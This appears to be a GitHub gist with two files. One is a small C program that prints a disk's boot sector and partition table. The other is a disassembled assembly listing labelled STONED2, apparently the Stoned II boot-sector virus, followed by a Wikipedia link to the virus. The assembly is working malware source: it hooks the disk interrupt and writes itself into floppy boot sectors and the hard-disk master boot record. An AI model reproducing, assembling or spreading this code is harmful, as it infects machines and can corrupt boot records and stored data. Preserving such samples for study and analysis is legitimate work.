Created
January 4, 2012 19:33
-
-
Save andrewrcollins/1561634 to your computer and use it in GitHub Desktop.
#TJHSST ~ Stoned II
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/* analyze the FAT */ | |
#include <stdio.h> | |
#include <dos.h> | |
#include <ctype.h> | |
#define ReadOnly 0x01 | |
#define Hidden 0x02 | |
#define System 0x04 | |
#define Volume 0x08 | |
#define Directory 0x10 | |
#define Archive 0x20 | |
#define MaxDrive 2 | |
typedef unsigned int word; | |
typedef unsigned char byte; | |
typedef unsigned long int longint; | |
typedef struct { | |
unsigned seconds : 5; | |
unsigned minutes : 6; | |
unsigned hours : 5; | |
} timetype; | |
typedef struct { | |
unsigned day : 5; | |
unsigned month : 4; | |
unsigned year : 7; | |
} datetype; | |
typedef struct { | |
byte name[8],ext[3],attr,reserved[10]; | |
timetype time; | |
datetype date; | |
word start; | |
longint size; | |
} direntry; | |
typedef struct { | |
byte status,starthead,startsc[2],type,endhead,endsc[2]; | |
longint startabsolute,numbersectors; | |
} partitiontable; | |
typedef struct { | |
byte jump[3],oemname[8]; | |
word bytesector; | |
byte sectorcluster; | |
word reservedsectors; | |
byte fattables; | |
word direntries,logicalsectors; | |
byte media; | |
word fatsectors,sectorstrack,heads,hiddensectors; | |
byte bootcode[416]; | |
partitiontable partition; | |
bytebootcode1[50]; | |
} bootsector; | |
int readboot(int,bootsector *),dispboot(bootsector); | |
main() | |
{ | |
bootsector boot; | |
/* read in the boot sector from drive a */ | |
readboot(0,&boot); | |
dispboot(boot); | |
} | |
int readboot(drive,bootptr) | |
int drive; | |
bootsector *bootptr; | |
{ | |
if(drive<0||drive>MaxDrive) | |
return -1; | |
absread(drive,1,0,bootptr); | |
} | |
int dispboot(boot) | |
bootsector boot; | |
{ | |
register int cnt; | |
printf("jmp code : "); | |
for(cnt=0;cnt<3;cnt++) | |
printf("%02X ",(int)boot.jump[cnt]); | |
printf("\n"); | |
printf("oem name : "); | |
for(cnt=0;cnt<8;cnt++) | |
printf("%c",boot.oemname[cnt]); | |
printf("\n"); | |
switch(boot.media) { | |
case 0xf0 : | |
printf("3.5in 1.44 Mbyte floppy\n"); | |
break; | |
case 0xf9 : | |
printf("5.25in 1.2MByte or 3.5in 720K floppy\n"); | |
break; | |
case 0xfd : | |
printf("5.25in 360K\n"); | |
break; | |
defalut : | |
printf("unknown format\n"); | |
} | |
printf("%10d bytes per sector\n",boot.bytesector); | |
printf("%10d sectors per cluster\n",boot.sectorcluster); | |
printf("%10d reserved sectors\n",boot.reservedsectors); | |
printf("%10d FAT tables\n",boot.fattables); | |
printf("%10u directory entries\n",boot.direntries); | |
printf("%10d logical sectors\n",boot.logicalsectors); | |
printf("%10d FAT sectors\n",boot.fatsectors); | |
printf("%10d sectors per track\n",boot.sectorstrack); | |
printf("%10d heads\n",boot.heads); | |
printf("%10d hidden sectors\n",boot.hiddensectors); | |
switch (boot.partition.status) { | |
case 0 : | |
printf("inactive\n"); | |
break; | |
case 0x80 : | |
printf("active, bootable\n"); | |
} | |
if(boot.partition.status==0||boot.partition.status==0x80) { | |
printf("disk partition table\n"); | |
printf("%10d starting head\n",boot.partition.starthead); | |
printf("%10d starting sector\n",boot.partition.startsc[0]&0x30); | |
printf("%10d starting cyclinder\n", | |
(int)boot.partition.startsc[1]|(int)(boot.partition.startsc[0]&0x0c0)<<2); | |
switch (boot.partition.type) { | |
case 1 : | |
printf("12 bit FAT\n"); | |
break; | |
case 4 : | |
printf("16 bit FAT\n"); | |
break; | |
case 5 : | |
printf("Extended DOS\n"); | |
} | |
printf("%10d ending head\n",boot.partition.endhead); | |
printf("%10d ending sector\n",boot.partition.endsc[0]&0x30); | |
printf("%10d ending cyclinder\n", | |
(int)boot.partition.endsc[1]|(int)(boot.partition.endsc[0]&0x0c0)<<2); | |
printf("%10ld absolute starting sector\n",boot.partition.startabsolute); | |
printf("%10ld sectors long\n",boot.partition.numbersectors); | |
} | |
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
PAGE 60,132 | |
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ | |
;ÛÛ ÛÛ | |
;ÛÛ STONED2 ÛÛ | |
;ÛÛ ÛÛ | |
;ÛÛ Created: 1-Jan-80 ÛÛ | |
;ÛÛ ÛÛ | |
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ | |
DATA_1E EQU 8 ; (694B:0008=0) | |
DATA_2E EQU 9 ; (694B:0009=0) | |
DATA_3E EQU 11H ; (694B:0011=0) | |
CODE_SEG_A SEGMENT | |
ASSUME CS:CODE_SEG_A, DS:CODE_SEG_A | |
ORG 100h | |
stoned2 PROC FAR | |
start: | |
DB 31488 DUP (0) | |
DB 0EAH, 5, 0, 0C0H, 7, 0E9H | |
DB 99H, 0, 0, 11H, 99H, 0 | |
DB 0F0H, 0E4H, 0, 80H, 9FH, 0 | |
DB 7CH, 0, 0, 1EH, 50H, 80H | |
DB 0FCH, 2, 72H, 17H, 80H, 0FCH | |
DB 4, 73H, 12H, 0AH, 0D2H, 75H | |
DB 0EH, 33H, 0C0H, 8EH, 0D8H, 0A0H | |
DB 3FH, 4, 0A8H, 1, 75H, 3 | |
DB 0E8H, 7, 0, 58H, 1FH, 2EH | |
DB 0FFH, 2EH, 9, 0, 53H, 51H | |
DB 52H, 6, 56H, 57H, 0BEH, 4 | |
DB 0 | |
LOC_1: | |
MOV AX,201H | |
PUSH CS | |
POP ES | |
MOV BX,200H | |
XOR CX,CX ; Zero register | |
MOV DX,CX | |
INC CX | |
PUSHF ; Push flags | |
CALL DWORD PTR CS:DATA_2E ; (694B:0009=0) | |
JNC LOC_2 ; Jump if carry=0 | |
XOR AX,AX ; Zero register | |
PUSHF ; Push flags | |
CALL DWORD PTR CS:DATA_2E ; (694B:0009=0) | |
DEC SI | |
JNZ LOC_1 ; Jump if not zero | |
JMP SHORT LOC_4 | |
DB 90H | |
LOC_2: | |
XOR SI,SI ; Zero register | |
MOV DI,200H | |
CLD ; Clear direction | |
PUSH CS | |
POP DS | |
LODSW ; String [si] to ax | |
CMP AX,[DI] | |
JNE LOC_3 ; Jump if not equal | |
LODSW ; String [si] to ax | |
CMP AX,[DI+2] | |
JE LOC_4 ; Jump if equal | |
LOC_3: | |
MOV AX,301H | |
MOV BX,200H | |
MOV CL,3 | |
MOV DH,1 | |
PUSHF ; Push flags | |
CALL DWORD PTR CS:DATA_2E ; (694B:0009=0) | |
JC LOC_4 ; Jump if carry Set | |
MOV AX,301H | |
XOR BX,BX ; Zero register | |
MOV CL,1 | |
XOR DX,DX ; Zero register | |
PUSHF ; Push flags | |
CALL DWORD PTR CS:DATA_2E ; (694B:0009=0) | |
LOC_4: | |
POP DI | |
POP SI | |
POP ES | |
POP DX | |
POP CX | |
POP BX | |
RET | |
DB 33H, 0C0H, 8EH, 0D8H, 0FAH, 8EH | |
DB 0D0H, 0BCH, 0, 7CH, 0FBH, 0A1H | |
DB 4CH, 0, 0A3H, 9, 7CH, 0A1H | |
DB 4EH, 0, 0A3H, 0BH, 7CH, 0A1H | |
DB 13H, 4, 48H, 48H, 0A3H, 13H | |
DB 4, 0B1H, 6, 0D3H, 0E0H, 8EH | |
DB 0C0H, 0A3H, 0FH, 7CH, 0B8H, 15H | |
DB 0, 0A3H, 4CH, 0, 8CH, 6 | |
DB 4EH, 0, 0B9H, 0B8H, 1, 0EH | |
DB 1FH, 33H, 0F6H, 8BH, 0FEH, 0FCH | |
DB 0F3H, 0A4H, 2EH, 0FFH, 2EH, 0DH | |
DB 0, 0B8H, 0, 0, 0CDH, 13H | |
DB 33H, 0C0H, 8EH, 0C0H, 0B8H, 1 | |
DB 2, 0BBH, 0, 7CH, 2EH, 80H | |
DB 3EH, 8, 0, 0, 74H, 0BH | |
DB 0B9H, 7, 0, 0BAH, 80H, 0 | |
DB 0CDH, 13H, 0EBH, 49H, 90H, 0B9H | |
DB 3, 0, 0BAH, 0, 1, 0CDH | |
DB 13H, 72H, 3EH, 26H, 0F6H, 6 | |
DB 6CH, 4, 7, 75H, 12H, 0BEH | |
DB 89H, 1, 0EH, 1FH | |
LOC_5: | |
LODSB ; String [si] to al | |
OR AL,AL ; Zero ? | |
JZ LOC_6 ; Jump if zero | |
MOV AH,0EH | |
MOV BH,0 | |
INT 10H ; Video display ah=functn 0Eh | |
; write char al, teletype mode | |
JMP SHORT LOC_5 | |
LOC_6: | |
PUSH CS | |
POP ES | |
MOV AX,201H | |
MOV BX,200H | |
MOV CL,1 | |
MOV DX,80H | |
INT 13H ; Disk dl=drive a: ah=func 02h | |
; read sectors to memory es:bx | |
JC LOC_7 ; Jump if carry Set | |
PUSH CS | |
POP DS | |
MOV SI,200H | |
MOV DI,0 | |
LODSW ; String [si] to ax | |
CMP AX,[DI] | |
JNE LOC_8 ; Jump if not equal | |
LODSW ; String [si] to ax | |
CMP AX,[DI+2] | |
JNE LOC_8 ; Jump if not equal | |
LOC_7: | |
MOV BYTE PTR CS:DATA_1E,0 ; (694B:0008=0) | |
JMP DWORD PTR CS:DATA_3E ; (694B:0011=0) | |
LOC_8: | |
MOV BYTE PTR CS:DATA_1E,2 ; (694B:0008=0) | |
MOV AX,301H | |
MOV BX,200H | |
MOV CX,7 | |
MOV DX,80H | |
INT 13H ; Disk dl=drive a: ah=func 03h | |
; write sectors from mem es:bx | |
JC LOC_7 ; Jump if carry Set | |
PUSH CS | |
POP DS | |
PUSH CS | |
POP ES | |
MOV SI,3BEH | |
MOV DI,1BEH | |
MOV CX,242H | |
REP MOVSB ; Rep while cx>0 Mov [si] to es:[di] | |
MOV AX,301H | |
XOR BX,BX ; Zero register | |
INC CL | |
INT 13H ; Disk dl=drive a: ah=func 03h | |
; write sectors from mem es:bx | |
JMP SHORT LOC_7 | |
DB 7 | |
DB 35 DUP (0) | |
DB 67H, 2, 6, 67H, 2, 67H | |
DB 2, 0BH, 3, 67H, 2 | |
stoned2 ENDP | |
CODE_SEG_A ENDS | |
END START |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
http://en.wikipedia.org/wiki/Stoned_%28computer_virus%29